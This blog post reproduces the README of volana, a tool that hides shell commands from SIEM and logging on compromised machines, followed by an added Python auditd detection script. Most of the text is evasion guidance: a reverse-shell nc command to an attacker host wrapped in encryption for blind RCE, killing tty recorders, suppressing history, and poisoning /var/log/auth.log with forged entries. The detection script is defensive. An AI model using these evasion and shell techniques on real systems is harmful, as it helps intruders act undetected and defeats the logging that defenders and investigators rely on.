Saturday, June 28, 2025

Shell Command Obfuscation To Avoid Detection Systems

Shell command obfuscation to avoid SIEM/detection systems

During a pentest, an important aspect is to be stealthy. For this reason you should clear your tracks after your passage. However, many infrastructures log commands and ship them to a SIEM in real time, which makes cleaning up afterwards useless on its own.

volana provides a simple way to hide commands executed on a compromised machine by providing its own shell runtime (enter your command, volana executes it for you). This way you clear your tracks DURING your passage.


Usage

You need an interactive shell. (Find a way to spawn it, you're a hacker, it's your job! Otherwise, see the non-interactive shell section below.) Then download volana onto the target machine and launch it. That's it: now you can type the commands you want to be executed stealthily.

## Download it from the github release
## If you do not have internet access from the compromised machine, find another way
curl -LO https://github.com/ariary/volana/releases/latest/download/volana

## Execute it
./volana

## You are now under the radar
volana » echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1 # you are allowed to be a bit cocky
volana » [command]

Keywords for the volana console:
  • ring: enable ring mode, i.e. each command is launched together with many others to cover tracks (against solutions that monitor system calls)
  • exit: exit the volana console

From a non-interactive shell

Imagine you have a non-interactive shell (webshell or blind RCE); you can use the encrypt and decrypt subcommands. Beforehand, you need to build volana with an embedded encryption key.

On the attacker machine

## Build volana with encryption key
make build.volana-with-encryption

## Transfer it to the TARGET (the one detectable command)
## [...]

## Encrypt the command you want to execute stealthily
## (Here a nc bindshell to obtain an interactive shell)
volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
>>> ENCRYPTED COMMAND

Copy the encrypted command and execute it with your RCE on the target machine:

./volana decr [encrypted_command]
## Now you have a bindshell; spawn it to make it interactive and use volana as usual to stay stealthy (./volana). + Don't forget to remove the volana binary before leaving (because the decryption key can easily be retrieved from it)

Why not just hide the command with echo [command] | base64 and decode it on the target with echo [encoded_command] | base64 -d | bash?

Because we want to be protected against systems that trigger an alert on base64 use or that search for base64 text in commands. Also we want to make investigation difficult, and base64 isn't a real obstacle.

Detection

Keep in mind that volana is not a miracle that will make you totally invisible. Its aim is to make intrusion detection and investigation harder.

By "detected" we mean that an alert can be triggered when a certain command has been executed.

Hidden from

Only the volana launching command line will be caught. 🧠 However, by adding a space before it when executing it, the default bash behaviour is to not save it.

  • Detection systems based on history command output
  • Detection systems based on history files
    • .bash_history, .zsh_history, etc.
  • Detection systems based on bash debug traps
  • Detection systems based on sudo's built-in logging
  • Detection systems tracing all process syscalls system-wide (e.g. opensnoop)
  • Terminal (tty) recorders (script, screen -L, sexonthebash, ovh-ttyrec, etc.)
    • Easy to detect & avoid: pkill -9 script
    • Not a common case
    • screen is a bit more difficult to avoid; however it does not record input (secret input: stty -echo => avoided)
  • Command detection could be avoided with volana with encryption

Seen by

  • Detection systems that alert on unknown commands (the volana one)
  • Detection systems based on a keylogger
    • Easy to avoid: copy/paste commands
    • Not a common case
  • Detection systems based on syslog files (e.g. /var/log/auth.log)
    • Only for sudo or su commands
    • The syslog file can be modified and thus poisoned as you wish (e.g. for /var/log/auth.log: logger -p auth.info "No hacker is poisoning your syslog solution, don't worry")
  • Detection systems based on syscalls (e.g. auditd, LKML/eBPF)
    • Difficult to analyze; can be made unreadable by making multiple diversion syscalls
  • Custom LD_PRELOAD injection to produce logs
    • Not a common case at all
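
The syscall-based monitoring listed above under "Seen by" is where a defender catches volana, and the same data source also covers the plain-base64 trick the README dismisses. The following script is an added example written for this page, not part of the volana project: it parses a few constructed auditd-style EXECVE/SYSCALL records (field names follow auditd conventions, but every value is made up, and real auditd hex-encodes arguments that contain spaces, which this toy skips for readability) and raises three alerts: an execve of a binary outside package-managed paths (the "unknown command" that is the volana launch itself), a base64-decode output piped into a shell, and an execve burst from one session, which is the footprint ring mode leaves. The allowlist prefixes, window and threshold are assumptions for the example.

```python
"""Toy auditd execve analyser (added example, not volana code)."""
import re
from collections import defaultdict

AUDIT_MSG = re.compile(r"audit\((?P<ts>\d+\.\d+):(?P<id>\d+)\)")
KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
DECODE_TO_SHELL = re.compile(r"base64\s+(?:-d|--decode)\b.*\|\s*(?:ba|z|da)?sh\b")
# Assumed allowlist: binaries managed by the package system. Anything else
# (e.g. /tmp/volana) is an "unknown command".
ALLOWED_PREFIXES = ("/usr/bin/", "/usr/sbin/", "/bin/", "/sbin/")

# Constructed sample records (NOT real logs): a normal ls, the volana launch,
# a base64-decode pipeline, then an 8-execve burst standing in for ring mode.
SAMPLE_LOG = """\
type=SYSCALL msg=audit(1719570000.101:1001): arch=c000003e syscall=59 success=yes exit=0 ses=7 uid=1000 comm="ls" exe="/usr/bin/ls"
type=EXECVE msg=audit(1719570000.101:1001): argc=2 a0="ls" a1="-la"
type=SYSCALL msg=audit(1719570005.220:1002): arch=c000003e syscall=59 success=yes exit=0 ses=7 uid=1000 comm="volana" exe="/tmp/volana"
type=EXECVE msg=audit(1719570005.220:1002): argc=1 a0="./volana"
type=SYSCALL msg=audit(1719570009.400:1003): arch=c000003e syscall=59 success=yes exit=0 ses=7 uid=1000 comm="bash" exe="/usr/bin/bash"
type=EXECVE msg=audit(1719570009.400:1003): argc=3 a0="bash" a1="-c" a2="echo aGVsbG8= | base64 -d | bash"
""" + "".join(
    f'type=SYSCALL msg=audit({1719570020 + i * 0.05:.3f}:{1004 + i}): arch=c000003e '
    f'syscall=59 success=yes exit=0 ses=7 uid=1000 comm="true" exe="/usr/bin/true"\n'
    f'type=EXECVE msg=audit({1719570020 + i * 0.05:.3f}:{1004 + i}): argc=1 a0="true"\n'
    for i in range(8)
)


def parse_audit(text):
    """Group SYSCALL and EXECVE records by audit event id into one dict per execve."""
    events = {}
    for line in text.splitlines():
        m = AUDIT_MSG.search(line)
        if not m:
            continue
        # Quoted values win; otherwise take the bare token after '='.
        fields = {k: (q or u) for k, q, u in KV.findall(line)}
        eid = int(m["id"])
        ev = events.setdefault(eid, {"id": eid, "ts": float(m["ts"]), "argv": []})
        if fields.get("type") == "SYSCALL":
            ev["exe"] = fields.get("exe", "")
            ev["ses"] = fields.get("ses", "?")
        elif fields.get("type") == "EXECVE":
            argc = int(fields.get("argc", 0))
            ev["argv"] = [fields.get(f"a{i}", "") for i in range(argc)]
    return [events[k] for k in sorted(events)]


def unknown_binaries(events, allowed=ALLOWED_PREFIXES):
    """Alert 1: execve of a binary outside the allowlisted paths (catches ./volana)."""
    return [e["id"] for e in events if not e.get("exe", "").startswith(allowed)]


def decode_to_shell(events):
    """Alert 2: base64 decode output piped into a shell, the trick the README rejects."""
    return [e["id"] for e in events if DECODE_TO_SHELL.search(" ".join(e["argv"]))]


def execve_bursts(events, window=1.0, threshold=5):
    """Alert 3: sessions with >= threshold execves inside `window` seconds (ring-mode noise)."""
    by_ses = defaultdict(list)
    for e in events:
        by_ses[e.get("ses", "?")].append(e["ts"])
    bursts = []
    for ses, stamps in by_ses.items():
        stamps.sort()
        lo = 0
        for hi in range(len(stamps)):
            while stamps[hi] - stamps[lo] > window:  # slide the window forward
                lo += 1
            if hi - lo + 1 >= threshold:
                bursts.append(ses)
                break
    return bursts


def analyze(text):
    """Run all three detections over raw audit text and return the event ids / sessions hit."""
    events = parse_audit(text)
    return {
        "unknown_binary": unknown_binaries(events),
        "decode_to_shell": decode_to_shell(events),
        "execve_burst": execve_bursts(events),
    }


if __name__ == "__main__":
    for name, hits in analyze(SAMPLE_LOG).items():
        print(f"{name}: {hits}")
```

Note the trade-off the README itself points out: ring mode makes the burst detector fire but buries the real command among decoys, so the burst alert is what tells an analyst to pull the full execve record set for that session rather than grep for a single command line.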

Bug bounty

Sorry for the clickbait title, but no money will be provided to contributors. 🐛

Let me know if you have found:
  • a way to detect volana
  • a way to spy on the console that does not detect volana commands
  • a way to avoid a detection system

Report right here

Credits
